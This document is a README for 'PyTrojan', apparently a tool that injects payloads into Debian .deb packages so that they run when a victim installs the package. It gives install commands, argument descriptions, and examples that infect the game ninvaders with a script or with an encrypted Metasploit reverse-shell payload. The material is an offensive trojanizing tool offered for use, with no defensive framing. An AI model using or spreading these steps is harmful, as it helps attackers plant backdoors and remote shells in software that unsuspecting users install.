Hey ! 
Welcome to PyTrojan docs !

So , 

<h1>How to install it </h1>
<code>git clone https://gitlab.com/eclairbleu12/pytrojan/

sudo apt-get install ccrypt

python3 pytrojan.py

</code>

<h1>How to use it</h1>

Arguments:

    --deb-file , -d -> Specify the deb file for injection
    
    --payload, -p -> Specify the injected payload 
    
    --name, -n -> Specify the name of the app
    
    [--no-bash],[-nb] -> Specify if your payload can't launched : bash yourpayload
    
    [--no-build],[-NB] -> No finally build. For add ccrypt manually in depedencies (control file in DEBIAN folder) because now , bot can't do that
    
    [--encrypt],[-E] -> Enable encryption. Work only if you have got ccrypt installed. And victim also. Or add ccrypt in depedencies manually with no build option
    
<h2>Exemple:</h2>

<code>python3 pytrojan.py -d ninvaders.deb  -p payload.sh --no-bash --name ninvaders</code>



<p>This code will infect ninvaders.deb with payload.sh

The output : injected_ninvaders.deb ( Ninvaders is a programm)

The virus will be launched at the installation of 'injected_ninvaders.deb'</p>


<code>python3 pytrojan.py -d ninvaders.deb  -p reverse_shell.elf --no-bash --encrypt --name ninvaders</code>
<p>This code will inject metasploit payload and encrypt it.</p>
    
<h1>Screenshot</h1>
<img src="https://i.imgur.com/9Qu8SXI.png">